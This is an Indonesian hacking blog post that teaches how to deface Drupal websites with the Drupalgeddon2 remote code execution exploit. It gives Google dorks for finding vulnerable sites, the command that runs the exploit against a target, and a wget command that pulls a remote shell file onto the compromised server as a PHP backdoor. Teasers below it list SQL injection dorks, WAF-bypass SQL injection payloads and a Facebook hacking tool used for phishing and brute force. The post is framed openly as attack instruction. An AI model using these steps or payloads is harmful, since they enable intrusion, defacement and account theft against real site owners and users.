Skip to main content

Deface Metode Drupal RCE ( Remote Code Execution )


ok kembali lagi dengan saya EssesCyber7 awokawok kali ini gw akan membawakan tutorial deface debgan metode Drupal Rce.

ok langsung saja ganz

Remote Code Execution adalah sama seperti arbitary code execution, dimana membuat attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, bedanya dengan Remote Code Execution adalah sang attacker melakukan injeksi coding melalui dengan mesin yang berbeda, maksudnya dilakukan secara remote terhadap mesin target.

Bahan Yang Dibutuhkan :

  • Tools Drupalgeddon2
  • Linux / Termux
  • Shell Backdoor

    • Dork :

    inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"
    inurl:"user/register?element_parents=account/mail" 
    inurl:"*drupal_ajax"

    kembangin lagi dork nya dengan otak bokep lu:)

    harus kalian lakukan pertama kali adalah buka tools nya terlebih dahulu di termux atau linux kalian, lalu kita ngedork dengan dork yang sudah di sediakan di atas, atau bisa kalian kembangkan lagi.


    Lalu buka terminal / termux dan ketikkan 

       $ ruby drupalgeddon2.rb targetkalian.com


    Dan jika exploit kalian berhasil, maka akan muncul seperti ini.


    Lalu tinggal upload shell/script kalian yang sudah terupload di dalam website dengan menggunakan wget, contoh nya.

       $ wget http://web.com/shell.txt -O shell.php


    Tinggal kalian akses shell/script kalian.


    Demikian tutorial Deface Drupal RCE kali ini, semoga bermanfaat. jangan lupa baca artikel sebelumnya yang sangat bermanfaat

    Comments

    Post a Comment

    Popular posts from this blog

    Dork SQL Injection 2019

    Hallo kali ini saya akan memberikan Dork untuk SQL Injection Yaps langsung saja di comot :p Dork ini bersumber dari :  https://www.nextleveltricks.com/latest-google-dorks-list/   Ok langsung saja  about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= c...
    Post a Comment
    Read more

    Macam-Macam Bypass WAF - SQL Injection

    Pada postingan kali ini w mau sharing artikel tentang Maca-macam Bypass WAF pada suatu Sql Injection. Dalam dunia injector kita tidak asing lagi dengan istilah WAF. Apaan sih  WAF  itu? WAF adalah kepanjangan dari (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum. Jadi rata-rata web yang udah di pasang waf itu kebal sama  SQL Injection  yang basic atau sql injection dengan statement error (  '  ) atau (  /**  ) Untuk itu gw akan sedikit berbagi tentang jenis-jenis waf yang biasa di gunakan dalam dunia injector. Dan berikut ini macam-macam bypass waf, order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**...
    Post a Comment
    Read more

    FBHT v2.0 - Facebook Hacking Tool

    FBHT (Facebook Hacking Tool) adalah tool open-source yang ditulis dengan program Python yang mengeksploitasi banyak kerentanan pada platform Facebook Install FBHT Tool Pertama sebelum menjalankan tool ini kalian harus melakukan cloning pada sebuah repository github berikut git clone https://github.com/chinoogawa/fbht Running FBHT Tool Menjalankan tool ini cukup mudah cukup ikuti perintah seperti ini python main.py Di sana banyak pilihan mulai dari Phising, Bruteforce dll, kalian bisa pilih dan menggunakan sesuka hati kalian :D
    Post a Comment
    Read more